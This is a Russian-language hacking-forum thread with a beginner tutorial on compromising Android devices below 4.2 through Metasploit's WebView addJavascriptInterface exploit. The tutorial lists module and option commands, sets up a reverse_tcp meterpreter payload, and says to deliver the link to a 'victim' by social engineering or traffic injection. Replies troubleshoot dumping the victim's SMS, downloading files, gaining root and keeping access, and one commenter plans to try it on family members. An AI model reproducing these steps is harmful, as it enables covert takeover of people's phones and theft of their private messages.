• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Android WebView Exploit или взлом андроида по ссылке

Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)

5.png


Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:

1) Запустить метасплоит
2) Выбираем наш эксплойт:
Код:
use exploit/android/browser/webview_addjavascriptinterface
1.jpg


3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j
3.jpg


4) Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...

4.png


5)Ловим метерпретер сессию

6.jpg


 
A

ApplePen

Я вчера заводил этот эксплоит на 4.4, Lenovo a806
 
X

xxxcrow

ребят, что то у меня ссылку не открывает
в чем проблема?
 
X

xxxcrow

Опишите более подробно свою проблему.
И было бы неплохо прикрепить скриншот проблемы.
простите, уже все нормально))
ток сейчас проблема, не могу сделать почти ничего, ни дампы не какие, не геолокацию,
мне кажется это изза того что я priv не могу поставить, говорит что такого фала нет
 
  • Нравится
Реакции: <~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
Путь к файлу будет выглядит примерно так:
Код:
/root/Рабочий\ Стол\sms.txt
 
X

xxxcrow

Опишите более подробно свою проблему.
И было бы неплохо прикрепить скриншот проблемы.
сейчас у меня вот так :С
4132b9b7288f4e238b5424969579c878.png


Можно предположить что неверно прописаны пути к сохраняемым дампап. Часто это может происходить когда в пути к файлу встречаются пробелы.В таких случаях нужно просто использовать символ слэша \
Путь к файлу будет выглядит примерно так:
Код:
/root/Рабочий\ Стол\sms.txt
помоему ты не правильно написал))
а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:
857d5bf2955747baa17074fb3bc7ee3e.png
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Тогда извини)
помоему ты не правильно написал))
а еще что то по русский не писалось, и я в итоге вот так сделал, но все ровно:
857d5bf2955747baa17074fb3bc7ee3e.png
Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
 
  • Нравится
Реакции: removed
X

xxxcrow

Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
тоже самое, и так с большенством команд,
хотя все 1-в-1 делаю как в туториалах (даже как и сам создатель метасплойта(или метерпетера))
позже попробую с другим телефоном, странно что на этом не работает нормально
(могу менять файлы и прочее, а вот что то дельное нет, не местоположения ни чего остального подобного)
 
X

xxxcrow

Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
кароче, есть предположение что у метерпретера нет доступа к руту, вот что :D
как сделать? :D
и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?

Тогда извини)

Попробуй выполнить команду dump_sms с параметром -o
Код:
dump_sms -o /root/sms.txt
а еще как я понял, после перезагрузки все теряется? :О
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
а еще как я понял, после перезагрузки все теряется? :О
Что именно понимается под словом "Все" ?
Метасплоит запущен от рута?
и еще вопрос, как СКАЧАТЬ изображение допустим, ну на комп свой?
В метерпретере есть команда download
 
X

xxxcrow

Что именно понимается под словом "Все" ?
Метасплоит запущен от рута?

В метерпретере есть команда download

метасплоит от рута, да, под словом все подрузамевается ну сессия и сам бекдор ._.

(на счет скачивания разобрался уже)))

(я даже только что выгрузил скрипт что бы рут получить для метерпретера)
 
Последнее редактирование модератором:

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
под словом все подрузамевается ну сессия и сам бекдор
Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.
 
X

xxxcrow

Ну естественно,на сегодняшний день мне пока не известно эксплоитов в метасплоите под андроид , да и в целом, которые при эксплуатации сразу же закрепляются в системе.Как минимум это достигается различными модулями пост эксплуатации.
а как закрепить? (в голове только одна мысль, сделать бекдор, ток вот как его установить?)
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Прочитай заголовок статьи, думаю логика очевидна что речь идет не про готовый эксплойт из метасплойта, а про то как создать свой бекдор с последующим бекконнектом.
Что бы достигать целей,нужно немного понимать что и как работает,а не просто один в один по мануалу делать и удивляться почему на выходе ошибка или что то не так)))
 
  • Нравится
Реакции: removed
X

xxxcrow

Прочитай заголовок статьи, думаю логика очевидна что речь идет не про готовый эксплойт из метасплойта, а про то как создать свой бекдор с последующим бекконнектом.
Что бы достигать целей,нужно немного понимать что и как работает,а не просто один в один по мануалу делать и удивляться почему на выходе ошибка или что то не так)))
ну а серьезно)) через данный эксплойт можно загрузить и установить апкашник (вроде как да, но у меня не устанавливается, поэтому не доконца понимаю все верно ли))
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Еще советую освоить что такое Эксплоит и почитать описания WebView Exploit в самом метасплоите.
И тогда вопросов станет меньше ;):)))
 
M

MrFreemind

Интересная статья, благодарю. Обязательно нужно потестить на домашних.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!